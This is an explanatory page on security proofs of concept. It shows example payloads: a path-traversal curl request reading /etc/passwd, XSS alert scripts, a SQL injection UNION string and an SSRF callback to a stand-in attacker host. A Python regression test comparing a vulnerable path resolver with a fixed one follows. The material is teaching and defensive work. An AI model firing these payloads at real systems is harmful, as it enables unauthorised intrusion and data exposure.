Proof of Concept (PoC)

A proof of concept (PoC) is code or a demonstration that shows a vulnerability exists and is exploitable. A PoC validates a security issue without necessarily providing a full, weaponized exploit.

Purpose of PoCs

  • Verify a vulnerability exists
  • Demonstrate impact to stakeholders
  • Enable reproduction for fixing
  • Support CVE and advisory documentation

PoC vs Full Exploit

# PoC: Demonstrates the vulnerability
# Shows arbitrary file read is possible
curl "http://target/download?file=../../../etc/passwd"
# Returns /etc/passwd contents

# Full exploit: Chains for maximum impact
# Reads credentials, establishes persistence, etc.

PoC Types

Non-Destructive

# XSS PoC using alert
<script>alert('XSS')</script>
<script>alert(document.domain)</script>

# SQLi PoC showing data extraction
?id=1' UNION SELECT version(),user()--

Out-of-Band Verification

# Blind vulnerabilities verified via callbacks
# SSRF: ?url=http://attacker-server.com/ssrf-confirmed
# XXE with external DTD fetching

Responsible Disclosure

PoCs should demonstrate impact while minimizing harm potential. Avoid publishing full exploits for critical vulnerabilities before patches are available.

Components of a Good PoC

  • Clear description of the vulnerability
  • Affected versions/configurations
  • Step-by-step reproduction instructions
  • Expected vs actual behavior
  • Remediation guidance
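The path-traversal PoC above is most useful when it doubles as a regression check that records expected versus actual behavior and lets the fix be reproduced. The following added example (not from this page) shows a vulnerable path resolver beside a hardened one, with a function that reports whether the PoC payload still reproduces; the document root and file names are constructed for the example, and the input is assumed to be already URL-decoded.

```python
import posixpath

# Constructed sample values for this example; not taken from any real system.
DOC_ROOT = "/srv/app/files"
POC_PAYLOAD = "../../../etc/passwd"   # the payload from the curl PoC above


def resolve_vulnerable(root: str, requested: str) -> str:
    """Joins the user-supplied name onto the root with no containment check.

    This is the 'actual behavior' the PoC demonstrates: '..' segments and
    absolute paths both escape the document root after normalisation.
    """
    return posixpath.normpath(posixpath.join(root, requested))


def resolve_fixed(root: str, requested: str) -> str:
    """Normalises the path, then refuses anything outside the root.

    This is the 'expected behavior': only files at or below DOC_ROOT are
    served. Absolute payloads are covered because posixpath.join discards
    the root when the second argument starts with '/'.
    """
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes document root")
    return candidate


def poc_reproduces(resolver) -> bool:
    """Returns True when the PoC payload still resolves outside the root.

    Run against the unpatched resolver it confirms the bug; run against the
    patched one it serves as the regression test for the remediation.
    """
    try:
        path = resolver(DOC_ROOT, POC_PAYLOAD)
    except ValueError:
        return False
    return not path.startswith(DOC_ROOT + "/")


if __name__ == "__main__":
    print("vulnerable reproduces:", poc_reproduces(resolve_vulnerable))  # True
    print("fixed reproduces:     ", poc_reproduces(resolve_fixed))       # False
```

Percent-encoded variants such as %2e%2e are not decoded here; the check assumes the web framework has already decoded the query string before the resolver sees it.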
